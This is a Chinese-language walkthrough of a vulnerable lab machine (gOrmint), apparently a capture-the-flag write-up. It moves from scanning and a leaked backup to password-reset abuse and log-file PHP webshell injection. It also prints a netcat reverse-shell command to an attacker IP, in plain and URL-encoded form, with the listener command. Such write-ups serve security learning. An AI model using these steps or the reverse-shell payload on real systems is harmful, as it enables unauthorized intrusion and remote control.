1.主机发现
2.端口扫描
3.访问80端口看看
果然404页面,看看robots.txt
4.目录扫描
用dirbuster扫描看看
依次快速访问完目录后未发现有用信息,就先从登录界面仔细找找
查看下源码
直接访问试试,没什么结果
扫描该目录下还有哪些文件
只找到了一个,访问看看
有一个压缩后门文件,尝试下载看看
解压后如下:
5.代码审计
db.sql最为显眼,先打开看看
发现有效信息id、用户名、邮箱、密码(暂时不确定什么加密),看看login.php有没有提到
MD5加密,解密刚才的密码
密码是demo,登录看看
很遗憾,登录失败,再看看配置文件config.php
根据提示,看看dummy.php文件
之前登录失败也可能是密码被重置了,看看reset.php
使用之前发现的用户名和邮箱重置试试
用户居然不存在,只能对email进行全局搜索看看有没有发现
在style.css中发现用户名:noman、邮箱:[email protected],去页面重置
重置成功,看到右下角的时间,联想到之前的hash加密值,在线计算看看
密码(绿色部分):161c7c128ce879b5371ddf4684f0338188e256c6,登录看看
登录成功,重置密码
直接访问下log文件(http://192.168.109.170/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-01-04.php),显示登录失败记录
6.getshell
在登录邮箱时,插入php一句话马
访问登录失败日志,提交post参数
反弹shell
cmd=`mkfifo /tmp/t`;
cmd=`cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.109.159 7777 >/tmp/f`;
进行URL编码后
cmd=%60mkfifo%20%2ftmp%2ft%60%3B
cmd=%60cat%20%2ftmp%2ff%7C%2fbin%2fsh%20-i%202%3E%261%7Cnc%20192.168.109.159%207777%20%3E%2ftmp%2ff%60%3B
开启监听:nc -lvnp 7777
连接成功获取shell,whoami命令查看权限,cat /etc/issue获取版本,也可以从靶机中看到版本
7.提权
搜索版本漏洞:searchsploit ubuntu 16
后续步骤与下面链接中靶机提权步骤一致